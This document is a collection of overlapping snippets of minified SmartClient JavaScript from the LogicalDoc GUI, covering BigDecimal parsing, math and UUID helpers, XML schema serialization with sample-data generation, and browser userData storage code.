636 return isc.BigDecimal.create(this)},isc.A.ceil=function isc_BigDecimal_ceil(_1){return this.round(_1,"ceil")},isc.A.floor=function isc_BigDecimal_floor(_1){return this.round(_1,"floor")},isc.A.init=function isc_BigDecimal_init(){this.Super("init",arguments);if(arguments&&arguments[0]){var _1=arguments[0];if(isc.isA.Number(_1)){_1=_1.toExponential(20)}
637 if(isc.isA.String(_1)){var _2=this.r.exec(_1);if(_2){if(_2[0]!=="NaN"){this.nanValue=false;if(_2[1]!==undefined){this.sign=(_2[1]==="-"?-1:1)}
638 if(_2[7]!==undefined){this.infinityValue=true}else{if(_2[6]!==undefined){this.exp=new Number(_2[6]);if(_2[5]==='-'){this.exp*=-1}}
639 if(_2[2]!==undefined){this.num=_2[2];this.num=this.num.replace(/^0*/,"")}else{this.num=_2[3];this.num=this.num.replace(/^0*/,"");if(_2[4]!==undefined){_2[4]=_2[4].replace(/0*$/,"");this.exp-=_2[4].length;this.num+=_2[4];this.num=this.num.replace(/^0*/,"")}}
640 this.normalize()}}}}else if(_1===Infinity){this.nanValue=false;this.sign=1;this.infinityValue=true}else if(_1===-Infinity){this.nanValue=false;this.sign=-1;this.infinityValue=true}else if(isc.isA.BigDecimal(_1)){this.nanValue=_1.isNaN();this.infinityValue=_1.isInfinity();this.sign=_1.getSign();this.num=_1.getNum();this.exp=_1.getExp();this.normalize()}}});isc.B._maxIndex=isc.C+17;isc.Math={clamp:function(_1,_2,_3){if(_1<_2)return _2;if(_1>_3)return _3;return _1},random:function(_1,_2){if(_2==null){return Math.floor(Math.random()*(_1+1))}else{return Math.floor(Math.random()*(_2-_1+1))+_1}},$119q:function(_1,_2){var _3=_1.toString(16);if(_3.length<_2)_3=isc.NumberUtil.$eg(_2-_3.length)+_3;return _3},randomUUID:function(){var _1;if(window.Uint16Array&&window.crypto&&window.crypto.getRandomValues){_1=new window.Uint16Array(8);window.crypto.getRandomValues(_1)}else{_1=new Array(8);var _2=new Date().getTime();for(var i=0;i<_1.length;++i){_1[i]=(_2^(Math.random()*65536))&0xFFFF}}
641 _1[3]=(_1[3]&0x0FFF)|0x4000;_1[4]=(_1[4]&0xBFFF)|0x8000;return(this.$119q(_1[0],4)+this.$119q(_1[1],4)+"-"+this.$119q(_1[2],4)+"-"+this.$119q(_1[3],4)+"-"+this.$119q(_1[4],4)+"-"+this.$119q(_1[5],4)+this.$119q(_1[6],4)+this.$119q(_1[7],4)).toUpperCase()},randomString:function(_1,_2){var _3=new Array(_1);var _4;if(isc.isA.Number(_2)){_4=_2;_2="0123456789abcdefghijklmnopqrstuvwxyz".substring(0,_4)}else{_4=_2.length}
642 for(var i=0;i<_1;++i){_3[i]=_2[this.random(_4-1)]}
643 return _3.join("")},$101j:function(_1){return(_1<0?-1:(_1>0?1:0))},$101k:function(_1,_2){_1=Math.abs(_1);_2=Math.abs(_2);if(_1>_2){return _1*Math.sqrt(1+_2*_2/_1/_1)}else if(_2!=0){return _2*Math.sqrt(1+_1*_1/_2/_2)}else{return _1}},euclideanDistanceToLine:function(_1,_2,_3,_4,_5,_6){var _7=_3-_1,_8=_4-_2;var _9=_7*_7+_8*_8;if(_9<=0.00001){return this.euclideanDistance(_1,_2,_5,_6)}
644 var u=((_5-_1)*(_3-_1)+(_6-_2)*(_4-_2))/_9;if(u<0){return this.euclideanDistance(_1,_2,_5,_6)}else if(u>1){return this.euclideanDistance(_3,_4,_5,_6)}else{var x=_1+u*_7,y=_2+u*_8;return this.euclideanDistance(x,y,_5,_6)}},euclideanDistance:function(_1,_2,_3,_4){if(arguments.length==2){var _5=_1,_6=_2;_1=_5[0];_2=_5[1];_3=_6[0];_4=_6[1]}
645 return this.$101k((_1-_3),(_2-_4))},$125w:Math.PI/180,$167a:Math.PI/2,toRadians:function(_1){return _1*this.$125w},cosdeg:function(_1){return Math.cos(_1*this.$125w)},sindeg:function(_1){return Math.sin(_1*this.$125w)},$fr:function(_1,_2){var _3=0;for(var i=0;i<_1.length;++i){_3+=_1[i]*_2[i]}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_Core.js
Code:

635 _5.exp+=(-1*_1);return _5.normalize()}
636 return isc.BigDecimal.create(this)},isc.A.ceil=function isc_BigDecimal_ceil(_1){return this.round(_1,"ceil")},isc.A.floor=function isc_BigDecimal_floor(_1){return this.round(_1,"floor")},isc.A.init=function isc_BigDecimal_init(){this.Super("init",arguments);if(arguments&&arguments[0]){var _1=arguments[0];if(isc.isA.Number(_1)){_1=_1.toExponential(20)}
637 if(isc.isA.String(_1)){var _2=this.r.exec(_1);if(_2){if(_2[0]!=="NaN"){this.nanValue=false;if(_2[1]!==undefined){this.sign=(_2[1]==="-"?-1:1)}
638 if(_2[7]!==undefined){this.infinityValue=true}else{if(_2[6]!==undefined){this.exp=new Number(_2[6]);if(_2[5]==='-'){this.exp*=-1}}
639 if(_2[2]!==undefined){this.num=_2[2];this.num=this.num.replace(/^0*/,"")}else{this.num=_2[3];this.num=this.num.replace(/^0*/,"");if(_2[4]!==undefined){_2[4]=_2[4].replace(/0*$/,"");this.exp-=_2[4].length;this.num+=_2[4];this.num=this.num.replace(/^0*/,"")}}
640 this.normalize()}}}}else if(_1===Infinity){this.nanValue=false;this.sign=1;this.infinityValue=true}else if(_1===-Infinity){this.nanValue=false;this.sign=-1;this.infinityValue=true}else if(isc.isA.BigDecimal(_1)){this.nanValue=_1.isNaN();this.infinityValue=_1.isInfinity();this.sign=_1.getSign();this.num=_1.getNum();this.exp=_1.getExp();this.normalize()}}});isc.B._maxIndex=isc.C+17;isc.Math={clamp:function(_1,_2,_3){if(_1<_2)return _2;if(_1>_3)return _3;return _1},random:function(_1,_2){if(_2==null){return Math.floor(Math.random()*(_1+1))}else{return Math.floor(Math.random()*(_2-_1+1))+_1}},$119q:function(_1,_2){var _3=_1.toString(16);if(_3.length<_2)_3=isc.NumberUtil.$eg(_2-_3.length)+_3;return _3},randomUUID:function(){var _1;if(window.Uint16Array&&window.crypto&&window.crypto.getRandomValues){_1=new window.Uint16Array(8);window.crypto.getRandomValues(_1)}else{_1=new Array(8);var _2=new Date().getTime();for(var i=0;i<_1.length;++i){_1[i]=(_2^(Math.random()*65536))&0xFFFF}}
641 _1[3]=(_1[3]&0x0FFF)|0x4000;_1[4]=(_1[4]&0xBFFF)|0x8000;return(this.$119q(_1[0],4)+this.$119q(_1[1],4)+"-"+this.$119q(_1[2],4)+"-"+this.$119q(_1[3],4)+"-"+this.$119q(_1[4],4)+"-"+this.$119q(_1[5],4)+this.$119q(_1[6],4)+this.$119q(_1[7],4)).toUpperCase()},randomString:function(_1,_2){var _3=new Array(_1);var _4;if(isc.isA.Number(_2)){_4=_2;_2="0123456789abcdefghijklmnopqrstuvwxyz".substring(0,_4)}else{_4=_2.length}
642 for(var i=0;i<_1;++i){_3[i]=_2[this.random(_4-1)]}
643 return _3.join("")},$101j:function(_1){return(_1<0?-1:(_1>0?1:0))},$101k:function(_1,_2){_1=Math.abs(_1);_2=Math.abs(_2);if(_1>_2){return _1*Math.sqrt(1+_2*_2/_1/_1)}else if(_2!=0){return _2*Math.sqrt(1+_1*_1/_2/_2)}else{return _1}},euclideanDistanceToLine:function(_1,_2,_3,_4,_5,_6){var _7=_3-_1,_8=_4-_2;var _9=_7*_7+_8*_8;if(_9<=0.00001){return this.euclideanDistance(_1,_2,_5,_6)}
644 var u=((_5-_1)*(_3-_1)+(_6-_2)*(_4-_2))/_9;if(u<0){return this.euclideanDistance(_1,_2,_5,_6)}else if(u>1){return this.euclideanDistance(_3,_4,_5,_6)}else{var x=_1+u*_7,y=_2+u*_8;return this.euclideanDistance(x,y,_5,_6)}},euclideanDistance:function(_1,_2,_3,_4){if(arguments.length==2){var _5=_1,_6=_2;_1=_5[0];_2=_5[1];_3=_6[0];_4=_6[1]}
645 return this.$101k((_1-_3),(_2-_4))},$125w:Math.PI/180,$167a:Math.PI/2,toRadians:function(_1){return _1*this.$125w},cosdeg:function(_1){return Math.cos(_1*this.$125w)},sindeg:function(_1){return Math.sin(_1*this.$125w)},$fr:function(_1,_2){var _3=0;for(var i=0;i<_1.length;++i){_3+=_1[i]*_2[i]}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

687 return _5.release(false)},isc.A.shouldWriteSchemaType=function isc_DataSource_shouldWriteSchemaType(_1){if(!_1)return true;if(_1.serializeXMLType!=null)return _1.serializeXMLType;else{return(_1.type==null||_1.type=="any")}},isc.A.$38g=function isc_DataSource__serializeSimpleTypeTag(_1,_2,_3,_4,_5){var _6=_2.type,_5=_5||{};if(isc.isAn.Object(_3)&&!isc.isA.Function(_3.$ew)){return isc.Comm.xmlSerialize(_1||null,_3)}else{var _6=!_5.xmlExplicitType||this.shouldWriteSchemaType(_2)?this.$38h(_6,_3):null;if(_3==null&&_2.nillable){var _7=_1||"value";return isc.Comm.$36u(_7,null,_4,_5.nsPrefixes,true)+" xsi:nil=\"true\"/>"}
688 if(isc.isA.Date(_3)){_3=_3.toSchemaDate(_2.type,!!this.trimMilliseconds)}else if(_3!=null&&_3.$ew){return _3.$ew(_1,_6,_4)}else{_3=isc.makeXMLSafe(_3)}
689 return isc.Comm.$ex(_1||"value",_3,_6,_4,_5.nsPrefixes)}},isc.A.$38f=function isc_DataSource__serializeSimpleTypeValue(_1,_2){if(isc.isA.Date(_2)){return _2.toSchemaDate(_1?_1.type:null)}else{return isc.makeXMLSafeAttribute(_2)}},isc.A.$38h=function isc_DataSource__getXMLSchemaType(_1,_2){if(_2!=null&&(_1==null||_1=="any")){if(_2==null)return null;if(isc.isA.Date(_2)){return _2.logicalDate?"date":(_2.logicalTime?"time":"datetime")}else if(isc.isA.Number(_2)){if(parseInt(_2)==_2){return"float"}else{return"integer"}}else if(isc.isA.Boolean(_2)){return"boolean"}else if(isc.isA.String(_2)){return"text"}}
690 switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}
691 if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}
692 var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}
693 return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}
694 var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}
695 return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}
696 return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}
697 _3.fields=_4;return _3},isc.A.getMethods=function isc_DataSource_getMethods(){var _1=this.methods||[];if(this.superDS()!=null){_1.addAll(this.superDS().getMethods())}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

2414 this.keyIndex={};this.reverseKeyIndex={};this.saveKeyIndex()},getNativeStoredValuesCount:function(){var count=0;for(var i=0;i<this.poolSize;i++){count+=this.userDataSpan[i].xmlDocument.firstChild.attributes.length}
2415 return count},getKeyForNativeIndex:function(index){var iCounter=0;for(var i=0;i<this.poolSize;i++){if(iCounter+this.userDataSpan[i].xmlDocument.firstChild.attributes.length>index){var offsetIndex=index-iCounter;var attrName=this.userDataSpan[i].xmlDocument.firstChild.attributes[offsetIndex].name,attrNum=attrName.substring(1),dsKey=this.getKeyIndexValue(i,attrNum);return this.getUserKey(dsKey)}}},getKeyIndexValue:function(index,attrName){var attrNum=attrName.substring(1);if(index==0){return"00000".substring(attrNum.length)+attrNum}
2416 return index*10000+(1*attrNum)},getUserKey:function(userKey){return this.reverseKeyIndex[userKey]},getDataStoreKey:function(key){return this.keyIndex[key]},$70p:function(dataStore,attr){return this.userDataSpan[dataStore].getAttribute(attr)},getValue:function(userKey){var key=this.getDataStoreKey(userKey),undef;if(key===undef)return null;var dataStore=(""+key).substring(0,1),attr="v"+((""+key).substring(1)*1);return this.$70p(dataStore,attr)},putValue:function(userKey,value){var key=this.getDataStoreKey(userKey);if(key){var dataStore=(""+key).substring(0,1),attr="v"+((""+key).substring(1)*1),savedValue=this.$70p(dataStore,attr)}else{var dataStore=this.getDataStoreForNewItem(),attr=this.getNextAttributeName(dataStore)}
2417 this.userDataSpan[dataStore].setAttribute(attr,value);try{this.userDataSpan[dataStore].save("isc_userData_"+dataStore);this.addToKeyIndex(userKey,dataStore,attr)}catch(e){if(isc.Offline.isStorageException(e)){if(savedValue){this.userDataSpan[dataStore].setAttribute(attr,savedValue)}else{this.userDataSpan[dataStore].removeAttribute(attr);this.removeFromKeyIndex(userKey)}}
2418 throw e}},removeValue:function(userKey){var key=this.getDataStoreKey(userKey),undef;if(key===undef){Offline.logDebug("userData: in removeValue, no value for key '"+userKey+"' was found");return}
2419 var dataStore=(""+key).substring(0,1),attr="v"+((""+key).substring(1)*1);this.userDataSpan[dataStore].removeAttribute(attr);this.userDataSpan[dataStore].save("isc_userData_"+dataStore);this.removeFromKeyIndex(userKey);this.unusedAttributeNumbers[dataStore].push(attr.substring(1)*1)},getDataStoreForNewItem:function(){var undef;if(this.nextDataStoreToUse===undef){this.nextDataStoreToUse=Math.floor(Math.random()*this.poolSize)}
2420 var rtnValue=this.nextDataStoreToUse++;if(this.nextDataStoreToUse>=this.poolSize)this.nextDataStoreToUse=0;return rtnValue},buildNextAttributeInfo:function(){this.nextAttributeNumber=[];this.unusedAttributeNumbers=[];for(var i=0;i<this.poolSize;i++){this.unusedAttributeNumbers[i]=[];var attrs=this.userDataSpan[i].xmlDocument.firstChild.attributes;var work=[];for(var j=0;j<attrs.length;j++){var num=attrs[j].name.substring(1)*1;if(!isNaN(num))work.add(attrs[j].name.substring(1)*1)}
2421 if(work.sort)work.sort();else this.sort(work);var counter=0;for(j=0;j<work.length;j++){if(work[j]==counter){counter++;continue}
2422 while(work[j]!=counter&&counter<=9999){this.unusedAttributeNumbers[i].push(counter++)}
2423 counter++}
2424 this.nextAttributeNumber[i]=counter}},sort:function(array){for(var i=0;i<array.length;i++){var swapped=false;for(var j=1;j<array.length-i;j++){if(array[j]<array[j-1]){var temp=array[j];array[j]=array[j-1];array[j-1]=temp;swapped=true}}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

686 if(_14){isc.Comm.omitXSI=_15}
687 return _5.release(false)},isc.A.shouldWriteSchemaType=function isc_DataSource_shouldWriteSchemaType(_1){if(!_1)return true;if(_1.serializeXMLType!=null)return _1.serializeXMLType;else{return(_1.type==null||_1.type=="any")}},isc.A.$38g=function isc_DataSource__serializeSimpleTypeTag(_1,_2,_3,_4,_5){var _6=_2.type,_5=_5||{};if(isc.isAn.Object(_3)&&!isc.isA.Function(_3.$ew)){return isc.Comm.xmlSerialize(_1||null,_3)}else{var _6=!_5.xmlExplicitType||this.shouldWriteSchemaType(_2)?this.$38h(_6,_3):null;if(_3==null&&_2.nillable){var _7=_1||"value";return isc.Comm.$36u(_7,null,_4,_5.nsPrefixes,true)+" xsi:nil=\"true\"/>"}
688 if(isc.isA.Date(_3)){_3=_3.toSchemaDate(_2.type,!!this.trimMilliseconds)}else if(_3!=null&&_3.$ew){return _3.$ew(_1,_6,_4)}else{_3=isc.makeXMLSafe(_3)}
689 return isc.Comm.$ex(_1||"value",_3,_6,_4,_5.nsPrefixes)}},isc.A.$38f=function isc_DataSource__serializeSimpleTypeValue(_1,_2){if(isc.isA.Date(_2)){return _2.toSchemaDate(_1?_1.type:null)}else{return isc.makeXMLSafeAttribute(_2)}},isc.A.$38h=function isc_DataSource__getXMLSchemaType(_1,_2){if(_2!=null&&(_1==null||_1=="any")){if(_2==null)return null;if(isc.isA.Date(_2)){return _2.logicalDate?"date":(_2.logicalTime?"time":"datetime")}else if(isc.isA.Number(_2)){if(parseInt(_2)==_2){return"float"}else{return"integer"}}else if(isc.isA.Boolean(_2)){return"boolean"}else if(isc.isA.String(_2)){return"text"}}
690 switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}
691 if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}
692 var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}
693 return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}
694 var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}
695 return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}
696 return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

688 if(isc.isA.Date(_3)){_3=_3.toSchemaDate(_2.type,!!this.trimMilliseconds)}else if(_3!=null&&_3.$ew){return _3.$ew(_1,_6,_4)}else{_3=isc.makeXMLSafe(_3)}
689 return isc.Comm.$ex(_1||"value",_3,_6,_4,_5.nsPrefixes)}},isc.A.$38f=function isc_DataSource__serializeSimpleTypeValue(_1,_2){if(isc.isA.Date(_2)){return _2.toSchemaDate(_1?_1.type:null)}else{return isc.makeXMLSafeAttribute(_2)}},isc.A.$38h=function isc_DataSource__getXMLSchemaType(_1,_2){if(_2!=null&&(_1==null||_1=="any")){if(_2==null)return null;if(isc.isA.Date(_2)){return _2.logicalDate?"date":(_2.logicalTime?"time":"datetime")}else if(isc.isA.Number(_2)){if(parseInt(_2)==_2){return"float"}else{return"integer"}}else if(isc.isA.Boolean(_2)){return"boolean"}else if(isc.isA.String(_2)){return"text"}}
690 switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}
691 if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}
692 var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}
693 return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}
694 var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}
695 return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}
696 return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}
697 _3.fields=_4;return _3},isc.A.getMethods=function isc_DataSource_getMethods(){var _1=this.methods||[];if(this.superDS()!=null){_1.addAll(this.superDS().getMethods())}
698 return _1},isc.A.getDeclaredMethod=function isc_DataSource_getDeclaredMethod(_1){var _2=this.getMethods();for(var i=0;i<_2.length;i++){if(_2[i].name==_1){return _2[i]}}},isc.A.getStringMethod=function isc_DataSource_getStringMethod(_1,_2){var _3=this.getDeclaredMethod(_1);if(_3){var _4=isc.addProperties({},_3);_4.value=_2;return isc.StringMethod.create(_4)}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

690switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}691if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}692var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}693return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}694var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}695return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}696return 
_9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}


697_3.fields=_4;return _3},isc.A.getMethods=function isc_DataSource_getMethods(){var _1=this.methods||[];if(this.superDS()!=null){_1.addAll(this.superDS().getMethods())}698return _1},isc.A.getDeclaredMethod=function isc_DataSource_getDeclaredMethod(_1){var _2=this.getMethods();for(var i=0;i<_2.length;i++){if(_2[i].name==_1){return _2[i]}}},isc.A.getStringMethod=function isc_DataSource_getStringMethod(_1,_2){var _3=this.getDeclaredMethod(_1);if(_3){var _4=isc.addProperties({},_3);_4.value=_2;return isc.StringMethod.create(_4)}699var _5=isc.DataSource.getNearestSchemaClass(this),_6;if(_5&&_5._stringMethodRegistry&&_5._stringMethodRegistry[_1]!==_6)700{return isc.StringMethod.create({value:_2})}},isc.A.$378=function isc_DataSource__handleXMLReply(_1,_2,_3,_4){var _5=_1,_6=_4._dsRequest,_7=this.getOperationBinding(_6),_8;if(_3.status<0){var _9=_2||_3.data;this.$38b(_9,{status:_3.status,data:_9},_6,_3,_4);return}

File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_Core.js
Code:

658_5.exp+=(-1*_1);return _5.normalize()}659return isc.BigDecimal.create(this)},isc.A.ceil=function isc_BigDecimal_ceil(_1){return this.round(_1,"ceil")},isc.A.floor=function isc_BigDecimal_floor(_1){return this.round(_1,"floor")},isc.A.init=function isc_BigDecimal_init(){this.Super("init",arguments);if(arguments&&arguments[0]){var _1=arguments[0];if(isc.isA.Number(_1)){_1=_1.toExponential(20)}660if(isc.isA.String(_1)){var _2=this.r.exec(_1);if(_2){if(_2[0]!=="NaN"){this.nanValue=false;if(_2[1]!==undefined){this.sign=(_2[1]==="-"?-1:1)}661if(_2[7]!==undefined){this.infinityValue=true}else{if(_2[6]!==undefined){this.exp=new Number(_2[6]);if(_2[5]==='-'){this.exp*=-1}}662if(_2[2]!==undefined){this.num=_2[2];this.num=this.num.replace(/^0*/,"")}else{this.num=_2[3];this.num=this.num.replace(/^0*/,"");if(_2[4]!==undefined){_2[4]=_2[4].replace(/0*$/,"");this.exp-=_2[4].length;this.num+=_2[4];this.num=this.num.replace(/^0*/,"")}}663this.normalize()}}}}else if(_1===Infinity){this.nanValue=false;this.sign=1;this.infinityValue=true}else if(_1===-Infinity){this.nanValue=false;this.sign=-1;this.infinityValue=true}else if(isc.isA.BigDecimal(_1)){this.nanValue=_1.isNaN();this.infinityValue=_1.isInfinity();this.sign=_1.getSign();this.num=_1.getNum();this.exp=_1.getExp();this.normalize()}}});isc.B._maxIndex=isc.C+17;isc.Math={clamp:function(_1,_2,_3){if(_1<_2)return _2;if(_1>_3)return _3;return _1},random:function(_1,_2){if(_2==null){return Math.floor(Math.random()*(_1+1))}else{return Math.floor(Math.random()*(_2-_1+1))+_1}},$119q:function(_1,_2){var _3=_1.toString(16);if(_3.length<_2)_3=isc.NumberUtil.$eg(_2-_3.length)+_3;return _3},randomUUID:function(){var _1;if(window.Uint16Array&&window.crypto&&window.crypto.getRandomValues){_1=new window.Uint16Array(8);window.crypto.getRandomValues(_1)}else{_1=new Array(8);var _2=new Date().getTime();for(var 
